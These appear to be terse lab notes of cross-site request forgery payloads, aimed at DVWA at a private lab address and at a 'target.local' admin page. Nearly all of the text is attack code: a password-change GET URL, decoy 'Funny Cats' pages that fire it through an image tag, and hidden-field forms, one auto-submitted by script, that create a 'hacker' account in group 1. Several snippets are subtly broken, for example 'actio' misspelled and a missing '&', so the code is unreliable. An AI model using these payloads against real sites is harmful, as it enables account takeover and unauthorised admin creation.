CSRF
GET
GET http://10.0.2.8/dvwa/vulnerabilities/csrf/?password_new=password123&password_conf=password123&Change=Change
<form action="http://10.0.2.8/dvwa/vulnerabilities/csrf/" method="GET">
<input name="password_new" />
<input name="password_conf" />
<input name="Change" value="Change">
<button type="submit">attack</button>
</form>
<html>
<h1>Funny Cats</h1>
<img src="http://10.0.2.8/dvwa/vulnerabilities/csrf/?password_new=password123&password_conf=password123Change=Change"/>
</html>
POST
POST /admin/
Host: target.local
Content-Type: application/x-www-form-urlencoded
user=hacker&pass=hacker123&group=1
<html>
<h1>Funny Cats</h1>
<form actio="http://target.local/admin/" method="POST">
<input type="hidden" id=user value="hacker"/>
<input type="hidden" id=pass value="hacker123"/>
<input type="hidden" id=group value="1"/>
<button type="submit" value="click to see more cats"/>
</form>
</html>
<html>
<h1>Funny Cats</h1>
<form class="hid" actio="http://target.local/admin/" method="POST" onload="form.submit()">
<input type="hidden" id=user value="hacker"/>
<input type="hidden" id=pass value="hacker123"/>
<input type="hidden" id=group value="1"/>
<button type="submit" value="click to see more cats"/>
</form>
</html>
<html>
<h1>Funny Cats</h1>
<form id="myForm" class="hid" actio="http://target.local/admin/" method="POST">
<input type="hidden" id=user value="hacker"/>
<input type="hidden" id=pass value="hacker123"/>
<input type="hidden" id=group value="1"/>
<button type="submit" value="click to see more cats"/>
</form>
<script>document.getElementById("myForm").submit();</script>
</html>